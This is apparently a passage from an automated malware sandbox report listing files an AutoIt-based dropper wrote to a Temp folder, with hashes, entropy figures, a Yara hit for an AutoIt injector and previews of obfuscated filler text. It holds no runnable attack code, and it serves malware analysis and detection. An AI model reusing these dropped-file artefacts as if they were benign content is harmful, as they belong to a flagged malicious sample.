                                                                                                                                                    SHA-256:D8BB4FE637F0C382AC6E15C78BAE29CD45930C6DAE3506A02EB50ED9B5C83EE4
                                                                                                                                                    SHA-512:76FF77AF68D6AE19448D98839DEAD0057E6AA2B23DF16F575913F3A4EA0D94DD23E42A380285F36FE38DC3A9C2F672A5DD7D9F840A2A883E1755C73A04495617
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: C:\Users\user\AppData\Local\Temp\qbmt\bvqmcwxut.docx, Author: Joe Security
                                                                                                                                                    Preview:..;...9ra.........-..*.?...*j.EzC$..o.@..\..C..f..`.....=..AL.5z....(.&+.:..C".xl...|....#.c.s...6n...c..W.i-..)...h.=....:B..M.~..../..d0'.[u..I...r..l.7<...v.o...5....v.'.S.&Ab...._..f..;....d.:P...d...%.....v...`P.k....!...Yz*..$.)$.........N.t.......1.=U..(.Uu&.9..0...@.....r..Y....Cf..U...q..e...ge7.M.c...s....x...z...J_&>.+rA.T.......~.......`..'....'b.!.2.....0a.u...........W.X.........L.W.....6HI..GYU.D.....4.e.K.8.6.5.6.....0.3.y.s.J.6.R.w.e.3.3.1.7.j.1.o.w.3.g.W......@....-....wb.!Wh9o...T.S.}..{R.J..-......p._.C.usJ....{..J#.]..G]...O.6..-y...#....V...V..1...l.Q...!p..+...5.P|.t....>....F.5.5.E.7.8.F.8.6.o.e.g.2.i.P.S.2.p.6.Z.G.A.9.3.U.d.4.J.G.c.9.1.3.I.....5.i.Q.A.E.2.1.5.b.4.....9.t.7.6.y.8......A\.b!..B.:.M....d....|.-.....G*J...c.+V|\X.-..:8.....%...)..OC...X.)&K....C....^Of..5...X.L.ff....@.}..}.g...g.)T..B.0..f.B..r&F/..W..m..L....GwE...;IT.m..._U'{`..........h.m.3.C.6.8.5.5.1.y.4.h.f.2.e.0.7.4.1.u.3.j.6.8.5.1.R.j.s.8.1.K.B.a.A.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\bwscnblc.msc

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):598
                                                                                                                                                    Entropy (8bit):5.533366767276767
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:0MtSCal0nUvrcDFBnwg6DrzX7V0tn2BPJtDRSQMcQqP1yQOM:0MgCRuwFRarzX70n2ZDRDtcy
                                                                                                                                                    MD5:42872A8299C923636DE82F9B8C4A9FD5
                                                                                                                                                    SHA1:34E35498029D6939BF99F3E67357FD8428383FB7
                                                                                                                                                    SHA-256:CB7308BEDA6F9FF1679BF8ADB0B0AB44DC160D20FABDD51A4EA47C1F3FEFE17C
                                                                                                                                                    SHA-512:8BD61EFD02DF1F69BE68A7497F590D90B08F611D9B1503EC66A2F40C31258D0B1FC2CDF10DF53A83F1CF6557F6866E9240B28382ACD16F092082A51AA84E69A8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:e4Z95QXn9m2s09FiVL581Y2wgwHkDn374c9wEQhL6hcX..UpDownConstants ButtonConstants..7q6nR0o1as48202L6396U5ih32V8d1164B5xa8Ju1gE5x7LV806Dg145rs1B1Fu810dtSJ54..ComboConstants ComboConstants..3td37BgdB2c979w92Oc615o9glpwB84i05p500a24Uv6a151a892BCb41Uy4j1tr45ulNL890zQ855ls3CfpA35YtP1q126Odrjq823de7i7c0qL3f4y53W1sGu3..FontConstants TreeViewConstants..7noBP969tHo0fN67s8mcUd7G4293..StructureConstants ToolTipConstants..KaCMY02Y4p3dt50akP4YQ9Jy65v6UO62D842K01g22kr10D0I854834Ay493Sq0w1u0J9q4G254S840Y5H26B8pb0034x93l63l2R5WW0ZfB6d9kE1W725Q1K1881mX767l8M9g9r6497l106uYWJoUkJ..BorderConstants UpDownConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\cahoackms.mp3

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):603
                                                                                                                                                    Entropy (8bit):5.577121557838347
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:Nek9yNU35QPbJ29JxdJnvi2SOxrQ3V41Nxv:QUp3OPb2dRvixOxryV4/xv
                                                                                                                                                    MD5:F9EBC2EB91660BA2F590171BE17DE8D7
                                                                                                                                                    SHA1:4C8184F056FAFC7399DD772A8FF4098BC4D35145
                                                                                                                                                    SHA-256:8E98A40279558B8377345897621D7E715614F02359FCF38C498643B103BDCC08
                                                                                                                                                    SHA-512:CFB031109D1B759ABA4FBF08497B5C9C2C2771DBAF1D11FA6DCE839A84B867605CD6D17D207833172D7432B6E67EDE6C77CFDAB5AF3BF729CF6DBEE3004F66C3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:GFXc655V5a34QTi6HI57C67hFQ9..FileConstants FontConstants..769O0c508Feg17GK7mr5w0O666esf943R7o1b35h843Lk..GuiDateTimePicker BorderConstants..ZC05H163F8KKIsTcb26d39ZRUKOXD3M1m04Yh81865485H70C148U6723Nzt1HB65ho0qpf0913yX9..FileConstants ButtonConstants..21yc725kQW0rpOrhF980T1nwe132ySnL3s478Nr1W14bKk..DateTimeConstants ComboConstants..735k04pL8Q6j6OPE8ar449OB735Yo0e8HM440s81t8r37E9m8SuSQ7x0uXA421SLcnA07m134iGd045..DateTimeConstants UpDownConstants..YY42Fz059vTUh8380y4CWTxG5G3S90138g55uj5127959z47940v0H4LLhX7HNT232CFJPF263N34ObS4F140620B83f0C23D75O31yc2p9wM47tAJVl9..BorderConstants GuiDateTimePicker..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\ceacdbp.pdf

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):536
                                                                                                                                                    Entropy (8bit):5.507197250242896
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:21jD/7daULLbqRvAb7OBPkFYlgq4dtPyP:Mv3LL4vYCbd4e
                                                                                                                                                    MD5:46DCD7F3DC237B4507EB4899C1591CB3
                                                                                                                                                    SHA1:522503E702F8D76E31B2B24AF1FFB1C39B28170B
                                                                                                                                                    SHA-256:12CAC5F80BADC0292C5DED44CF86D69F016FF8A26702C48162DD8FD3FCF30189
                                                                                                                                                    SHA-512:F9967B456C70E0FCD1405A544DC79DE7AED339DDFA055FB774510DBF2BF09D0023E8E9A957B3ECC85762236DD16E751516D406A877C2CE59187D68DCE7EF6E08
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:4143930et39Yr51W0L310Yhf75pZ8Dt02cN3IBz59445p3f9F88ohaO8JK431n1N5V9A7f3M4q26h0a2Zh19u674205N20Wdu4Qplz15z9kn6qfMV0BD0AtsZa1R59G4222pDY1584io17wl9..DateTimeConstants StructureConstants..okwC3738T6o92vNGJa2N43Nl364KazQ317..ToolTipConstants FileConstants..74li60X8199q2B9L3Nj067GF04296P5H..DateTimeConstants TreeViewConstants..39Rl113Xmy8X6v469zF607FF9z9bq0159uL9Rb76WF52R3C1g7G75EQ80Wjf0U5u5F9S7eIG1..FontConstants FileConstants..J3cF7GT7z3AleNie01O89w40565oL062q0t36hK18Gl7nxt28506i7w8Xs3f0hdkS5ov5W7xa..ToolTipConstants ComboConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\cmjr.msc

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):591
                                                                                                                                                    Entropy (8bit):5.486133823087205
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:VG93NWupdOgiSdqI/WPXNycZO0UXLD5ojObhZKNUOd:VGZNWupdOqZ+PI0UXLCjOby
                                                                                                                                                    MD5:BCF3C4465032F6EE4C69BAA6D9BD9290
                                                                                                                                                    SHA1:826E59FB2F690D3F30C915DDF4B14DFD9C68FE55
                                                                                                                                                    SHA-256:41BDB0FAB57C8147AD9F09C4F0D898B6DD43EF1CABB26F9122552B6E948500E5
                                                                                                                                                    SHA-512:35FAC351ABCB29C2174D025A61804FED71AC9DCA43130A6156736AB47280B729DF0E2BC1B5F4D1D7272D49738B70B2012FADDD6D76D86B1242B7F70B0050649C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:iks664u5sm4836W93V6X..BorderConstants ButtonConstants..79Jh6251g1d0bgT9gX0Fo9yt10LP4FOu4h0u4W78lLBKpm2W77H3g53664h210qf4725ku8ixBT1G3ziLG027s18u9wN0iqi0U9OT9k28S1Bm12knWOg6T04..ComboConstants FontConstants..06Lr84l3YD4AqDJ1T6ksQH43c4Pv546yMHC02Pf6v40j3fg0K67UCt93D3a4Gg5V9wx420..StructureConstants FileConstants..7HxT585gOL6zI24WJd1j1S7429p7935q343OVmugw08h0254v9720P61Cc880EZ32g3U2W1Q29J83Df17899u0319H41847e96..FontConstants ColorConstants..11k8..ToolTipConstants UpDownConstants..vp15S15md55Q917ZToNc04fOb673556e40f8NW55WsGl1H57191eX0n7216MtT9sP5KiojF5..ToolTipConstants ButtonConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\coeheprrr.xl

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):504
                                                                                                                                                    Entropy (8bit):5.41211794098473
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:S6zQRTKnF8wjnSaqHsyIKNZsuNfzFwZqW6:1zCT0F8nHsbSsuNfzeZqW6
                                                                                                                                                    MD5:97A1AE97F1350D07CADF8E0A010B216A
                                                                                                                                                    SHA1:3B5555139B866AECEF0A2565AB47D7E555F7B097
                                                                                                                                                    SHA-256:951DBCBEB27D6D73D66E6EC4BA14538A7C37C5B439CB02C114E891A9DB9A34FC
                                                                                                                                                    SHA-512:B4CF9489AA0A8C1E98C0EC326CCF75D7944E982EB46BB049DA5034E1751261C987530A41485C593FE4ACEA7ABE402A3F26D1A9DB8AF89347A59CA243EDDC75BE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:L0Dre13..FontConstants ComboConstants..c4p4x0233h4Y2TlxYm..StructureConstants ButtonConstants..5BxZl05d374ytDb39mg3eb54A203rx7GD1C0Cf6..BorderConstants FileConstants..32Itu9a28E390F5C6b7W2F..ButtonConstants ColorConstants..012O84wL9916xX34Su85Q6RGZ9375082MRi2xKyQLgQ6gn4U9917a32QB44qL1Wn1O60T4w6lLmj90z5BUW62Y4SV78Yh40290..DateTimeConstants FontConstants..3816s6k67t10jhWctrKw248yK58609635IPZ56h3GL1M4iO22A0Ht4kT51ZtDVy59XP96o6yr65kZVYFma4326X7Tr3G2060K2U7p207N7Sb75bP..ToolbarConstants ButtonConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\cuumqdvjk.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):602
                                                                                                                                                    Entropy (8bit):5.600351569577517
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:OXk5vR/8cAr/X9QGeSz+s9tzuwXb21dP0zxb3evR3N:OXk5vps/X9QGers9td4dP0Nb3S3N
                                                                                                                                                    MD5:382FB868BF2C280F0A67B8055EFB9928
                                                                                                                                                    SHA1:C740CEB7A49FB1F77EC225529DF364DD133D3675
                                                                                                                                                    SHA-256:97F52EADD90E55427D8350F2E5585D9C15B8E00BA82CEA1FD09FF95445D957D7
                                                                                                                                                    SHA-512:1BB8BB9379E8ECFD3F7D90E2AA910825B91F6E29F9CC0D6AFF3266D351ACD3060497D2F8B59B4A285BB015CB893FEB4920E79EF23F7E7139011C4DCE4BC06805
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:6g9IYv05NmY8U3lIz8MbxrB554y59UHm7bjYu029BH9shFfxql01qMx1MdRPEk8079X8p443X1KE4Z7Gn2t662B02O88B9W1d1f052z247324L0I3n38k014WXci89bo1R4ItC4wXEMFXLyN0i44465p0962Hj762dghB70157Ixm2X2enVEA6482X2z..ToolbarConstants UpDownConstants..t703W7u7s6E45q43oDaU869dvR2lk4vaTX4b91C3n3G23..ToolbarConstants GuiDateTimePicker..3lV20Yn2w3F73ph435ZZB828N3mrQUn084GF1vl1hjYk14L562h69g749H3rET677a9F1390EH3L4b2wBgRVL3S938Qyyz90m5H99..BorderConstants ToolbarConstants..E525f7P1oQW97ad83kszCq4C8wzc846t221s65qR401rTe61QL9s318LC7aU1fTn914gy2o74mH627812ig6k2p8w56f4E90kS6d2344nVo4hv1ZG471i92nI8xVl..FontConstants ButtonConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\fhnmu.das

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):509
                                                                                                                                                    Entropy (8bit):5.43409369817081
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:RGrvKNNfgOqhXsefdMGIUycy6F1SoOBPc:RiKNxgOqhXsYIUiMS7O
                                                                                                                                                    MD5:C4B81747B551CF4FCCC5C0E552252649
                                                                                                                                                    SHA1:8C6C293777A93B8752450437CBA667B05C9E23F6
                                                                                                                                                    SHA-256:B4B21FBA0D3DBA4AE00C9EB45E2E193E273547FA86B1E4C77C47A58DC80231BA
                                                                                                                                                    SHA-512:49E5DC0E9A2DFC7F729A1F8F757FA7ECDC7BBCE3C20B17DCFFC45F04A14943DA30758F55B43BD5A1270E07A8CCD848044834D05C89E65F2487117B8C810F6937
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:1i65R30aDx6Am77I73j38bNATE404U27EU42Q20f1UU69BX4Ud0g59JV2071nkO81Yb2131485..ComboConstants ButtonConstants..03ZDf5Ipd29U6D53q5Bdr93u37Yv561Oxu79iD56YZnwwJA4266su9AU53H4b70w4951..BorderConstants FontConstants..53LTuB5FW08K69E3kMBuA2d42M3z87qz521x3v14..GuiDateTimePicker UpDownConstants..5X37555l42Y24uD8Id9B..StructureConstants FontConstants..3H2382nZaoX392M657Ft8Ly1147d7v8..DateTimeConstants ComboConstants..236Ka3585h02i7C54R827snLO8nR85UHxH05329u6RTbi981fP11068a9576s..DateTimeConstants TreeViewConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\fljca.xl

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):648
                                                                                                                                                    Entropy (8bit):5.52835035781214
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:6FAbf+QBacUXCqJ5MclrGVcnckdeIHVpuTz9NdpvBYXDlFNX2/Oyf:6FAqQBEXCqJ28GVEckdeIHCfdpvud23f
                                                                                                                                                    MD5:FB7BC1E54A3A13C46ABEFB4B5894EAFB
                                                                                                                                                    SHA1:6E1EB3DF791408DB1CD6428582F5F057C755B3E8
                                                                                                                                                    SHA-256:1F5B7C71AD67BDFB5598D77F70CB9A7CAFC02AB47AF0140722DA2A75F21DE972
                                                                                                                                                    SHA-512:9657589C71AF1CA199E45A5B1F3A8BF225A12288D642BA476AE022C3D69CEF30D29D8C797BBA4F8FEF0EFFA8262723E289417DE394CB90C21C79231410C9ACAF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:01CtI38o1H76Y8R5Ogu5366zoDg3S817..GuiDateTimePicker FileConstants..02f8b733ir5vC5mALCrZ24c474N0n4tcy7Z17rOR13F9r72477j44T..ButtonConstants FontConstants..550ne570930595iapUEGo9GY8K1L2Vu0n61N8858l0782vrFm91Y140x59t206s5HxP0BSB0aW4l42BFjU6O041G6t7J5pU29u..FontConstants BorderConstants..95h7P1tRRy66DV81X0hdZ70kRscuJ3LNugs7DV7237q4xZS68z6a22wSrw027FVqeroH44H..BorderConstants ToolbarConstants..135Liw32lOvj29LFB8P630N48Rd9A8jJFK344Z17807nKY9x936tKyo41..ColorConstants BorderConstants..1CX774W775hcAH0Q5HD9V7O2h448iv2jk2u605nIe82477P2lMNZI48y3ihav43fT2dfa176RqN20O8m581wyw1r2Cw9P9703h7cTb084Rjl6683Yf90207F7t3Z58Xtr8i..ButtonConstants ColorConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\jnfubqkpck.das

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):686
                                                                                                                                                    Entropy (8bit):5.609085570277811
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:f0lWGZEo5epC4RXitZ6V8lqHx3Ol+/SwZBChhdRDjORlFPI1h2rEbWVs4Kqvx:xGqC4RXMK8qO4/S8BChHR+3C1Wku
                                                                                                                                                    MD5:AD648C8818A74800CEA50CA6D7AFB649
                                                                                                                                                    SHA1:F146194D6B62FD61BB37B2A9A7DF64F5BD6D7BB0
                                                                                                                                                    SHA-256:C32B59E53FE7283D8FD4BBB2BA8FB9B68D27683FC4F773B7025AEBD4E71E654B
                                                                                                                                                    SHA-512:9885E22FF1B1666916BBDDA72B8F40D8ED8CC7015CE6529CE552102F0C379D8352CB7F65176B9A55AD1D857FA50211B220CBBD2C81730E9297C8E03597ED083B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:9M5ut700bF7z5pv6aF6w1FaPKq03o9mzq1jtS64Wxd3R499GEm3P84Q1ET4R1..DateTimeConstants GuiDateTimePicker..50582ShsYU4pD5L56Zl1q..UpDownConstants ColorConstants..2h4T8fq0z6S80l9133815E636F657xb37q74V21FfUGXP91nCw1L1ts4jPjb65lHCW96C2F08m3486jk85w7L5omIu66VP41rCLS49UVZJ8VXgo453e327U7Z0xH0mi4..DateTimeConstants FontConstants..1355d741H8T712f497T6m81P42Epn57d02ZlPvi4o131IsUYG086Gi220D3Kf2P1LNS1Ac130G4GSt096c1WE8GF3oE88m641560297NNO6GA4pl27K44DN44RpJU848Q183CrNFlD..TreeViewConstants BorderConstants..UGq4898hLl9fKn3k97p29589uw6AJ0012yg71L2UmX6132v5i0l1Hz62u2oSxV5987o6iYa766qa06057GHC8F3lOH3cU78bVjM6a3NHD7QF7x062152997n1vWq0VxQzv4tD2V59Xir1kR317k3bC1S780..DateTimeConstants ToolTipConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\jrnfvrdb.pdf

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):534
                                                                                                                                                    Entropy (8bit):5.553428869759938
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:rrEvL7sn0PVaJuyfkx0PU9rPVuzP+Gqv4:rrGgXkxfdPVM+Gv
                                                                                                                                                    MD5:44BCCC48AEA68F6C7601B4C28E13DFFE
                                                                                                                                                    SHA1:2F6DE537DFC7BE56A1DDE34817428EFFC89D09AD
                                                                                                                                                    SHA-256:12DF5C527A4FA33C11945127CAE2B627FC904F903B3D5E1FA790FA5E93526DCF
                                                                                                                                                    SHA-512:B36429D395D36654781659B544ADFE26C99DFE0FBB579C24C6907287B7807BDB25967E06908779EE6F6FF324C863FAF7A6C9162040C1D4CCCC6649A7ECB5AD38
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:89069X8LAB4l8RR52uXi71900vB640p53vq949FjzvRBeYon6H183851210jF1o..ButtonConstants ToolTipConstants..BnR6bX1b3X8099F8109m1400T5K4iJ5oje19BK4b783wQUp6r227ghnv9UrH9UO6jd4i026v7gGg62QX..TreeViewConstants ColorConstants..1229WIHF4344S77Xv96h52M5d04Ac59hLpY0r2RXubMt55h9SD09U12eqB3Inp0iJqyRB0964AwT912uON1x45VJnB1184e44b..TreeViewConstants FontConstants..s5K9Z75872s736EzEov7M4L5QAm016662L7h7j15u466vi6UM39iRl4Hhy1004Lk43w4lg51v5543R8qBD4u38Fck0535c7512mRMblz54890516n7q5fOJ30qty0062AJL4EO35gn8a2KtL3f53z9yP..ComboConstants UpDownConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\luscgxin.3gp

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):508
                                                                                                                                                    Entropy (8bit):5.444647219340999
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:AwZsTyknfb56qFZJwkwjGjy4FBP8kkkpct:RsHnz56qZYGjywmlkpY
                                                                                                                                                    MD5:95ED1612D4995A1339883F3C2DA20BED
                                                                                                                                                    SHA1:BBA7FEABF0182AAF1BF2B48314BE515C9326A686
                                                                                                                                                    SHA-256:B2FFD14EE25FFEACE578F6FD512FC49005AFF59FD057607D0FA2C600DAFED696
                                                                                                                                                    SHA-512:3B3EA03399C734A2C927EF41FFD971306504F672E4B5FA8AB7897CD54C5986FF2EC0BAB0825860746AD262D8F89D59D0797EE5B13628E40B45F83F8256C4A266
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:50q42698J25h..DateTimeConstants FontConstants..u24v210sq759b2750lGgVn3J019OkLP1N8tSU7b6sqQ2xx3005x92xk56R583R7B87P2882xh111i87m3l29KP49Pb1JNL8172732F5712UcxfIVr039w01TM624419osyZp..DateTimeConstants ComboConstants..o8FcF87jYazt7lf9P42jm59t4s60300394oP7332fw273r1879944JM7J8Sm9z6i7wd0UR90q90..ToolbarConstants BorderConstants..6l595I52..ButtonConstants TreeViewConstants..TqqXG09gYin3J78x51H7j215vm0g08u2715A48K31BVmS4P6q7pZ5oNr67eO62a55Y77a1000TmId3r9L08r1hBF5K0y60H2G1lT23iw0..FileConstants ComboConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\mjupm.docx

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):572
                                                                                                                                                    Entropy (8bit):5.522453659556589
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:ZBfrt2UERrH5IhZL85zxhOORdCT+CqVUIdm3Wot87R:ZJ523NYZRgYtkm27R
                                                                                                                                                    MD5:FC495C99E26C918CCCAFE8A212355EE9
                                                                                                                                                    SHA1:15A87B4265DA49FB5D9EDADE69111D49BA55B8DA
                                                                                                                                                    SHA-256:010E35603796229A5EEA475725E2F191DFEFCB0AE06306E8502045A84FCA335F
                                                                                                                                                    SHA-512:80AB91EE659BFC895F8AAE514D63DA5DD8F3F53CB2C16B91A24F0CBFD83D604026C18C5FF0237E8E8754242A96C74655CAB215548FDEA894EB56CB7C0FC8922B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:d32tfVU8R4M9E1289d0Co62qwZYq3860U9O7Iki56760q1ak4m985d1AQ7u6v80H9xFv09s0483u2eVz7vJx18fHJTABR83dZAHT29066AD516Iw6p5f3..ToolTipConstants StructureConstants..1Gg6xiP999yP804oQtyUe74US469544Y3702f5E668ei66t37k7I4Q8Z88793v172M13478548r612S3233iLOvE1853SoZ..BorderConstants ButtonConstants..7778VAG511l7QNAI7xR5185rn7V340An428u1D0tnT98ey2..ToolbarConstants StructureConstants..w2bvphkA731P0SsI0I9w627g2i4oKvp2E3C9sz7G954p2091IFy5r1I0230w5w2789cW7uv8jSun59qTn46878vT9Q92mO28wY9mU0IF094758Xj8t89n08d9S17XjL3l3N5L66C1e2GS0mr2enBUcE75o7B037Oa2r..ToolbarConstants ToolbarConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\mummtms.icm

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):616
                                                                                                                                                    Entropy (8bit):5.593470127639937
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:NWSdpPp4vnIw9ahP6EviWL1eVCmMLXQllE0U7gX+aOmR:Ys4wHJvXe87Tgm0nuaOmR
                                                                                                                                                    MD5:95E90D53B6DD6501967D8E2D9BF0EF8B
                                                                                                                                                    SHA1:EB28D3148C97BE0F2650972F6772E8CE84D86D51
                                                                                                                                                    SHA-256:846E94F46D1201E4AFDF32F0374C90AD4D1E23E89B5000C96EA124C80C8524DA
                                                                                                                                                    SHA-512:B2EA6242F7F2754F4D3D9B478EE97713D8F635393C681164A07AC5C475B623495F9AE0BC243964A591CFE540FDDD4CD195323BB918A63E761AC23E0C4ADED046
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:a71x0l2e8Ec1jejYAwV9295zDkG5u27Y69qY2113380nwbN2Pi149I8J67..TreeViewConstants ToolTipConstants..221eY4ot9822MEPAKV5thUi6o9685ny6C8642EY9QGCUbsY4w88J1bqFeh64017sz7S50p7G4n9ys7WKop02n978F8Q181o6vpIcEF2Z12X..FontConstants GuiDateTimePicker..rCpyBb74r34E92uS1hvc63C7H3vU25yc1yj20P4I84QM87i5i1123TV83j69Dw1381532Vp301YPN3nlGb7vtU5dQlZ2771Kn08184879889w4ux24p1w1p244v0p9259l5edpuJv9K30cl24043513439Nyi..DateTimeConstants DateTimeConstants..35qP760eQR252V7hq65102837jC7xcs45AHkODAT2A45xMK44l0t5HINmG802808Duc45d49H2c74fKP9mvCK04kA46N058k95zmm07w05eW7996VGERpu9j1CJn9dZ7CUr7g5J3x6RUU36TUMQk..FileConstants ToolbarConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\nfwlowj.mp3

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):564
                                                                                                                                                    Entropy (8bit):5.514774909684432
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:JeodvXxNOBJdqM4h6XVgaKkyIO9jxLCwSDe+wXXzJ:Je8vOb34h6XVg887SDe+wXXzJ
                                                                                                                                                    MD5:BC4084B5A1C6B6D70D37A0D4D657FB84
                                                                                                                                                    SHA1:3011BC2E36349DF995CC0440B9579829E4628402
                                                                                                                                                    SHA-256:1581F7FD0889C340453E9A34846A61B899671FC59E8B2E67C98F628C290968A2
                                                                                                                                                    SHA-512:004E366AC7B64D083E329D9EF91C0EBECD9E966F52D93B94C2293EF30CDFA793A6D18E73074FD3148FEDD2FD4EF7E382046050503F1FEE83E20856B9B8DA64D4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:4kI02Bm527GQp6f2s8YGY69OT315k88932GoMP8v27061U89y618443566MZ288a28WX47M6E79i324B2i2D2m34CYhx8r31f465..BorderConstants UpDownConstants..4U24Q717C3a8l82L3gK9p090B0IQ3dO7hKi2kv6dg0pS831yCju714X2o2..ColorConstants ToolTipConstants..2p9K3W4u9nVf3T..BorderConstants ColorConstants..ah4L3OC481xcsT5253Pge2AyL830858m4u58Ux3v0pgOKdE1333lG5414F4C8De11cWoKH23Gp19mcfNr7J8t954XaW3NSnTC0q0cY6ye0Y387Le3HYsR12EQ..ToolTipConstants DateTimeConstants..j21IC8aRcx8J2M..BorderConstants GuiDateTimePicker..160Jc76FzEjN3OJDJg95Wh372b8690s193640V3na04585Y..FontConstants FontConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\ojaqhh.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):569
                                                                                                                                                    Entropy (8bit):5.607960549209402
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:wbKXLINQ3giBAseD3lImN8Rq674u2bWwFVCaMlUNJ09ON0aBPc:wbKXMQVBJnmc779gWg9G40aO
                                                                                                                                                    MD5:7399AD2ED1976A8AF8FD293039757336
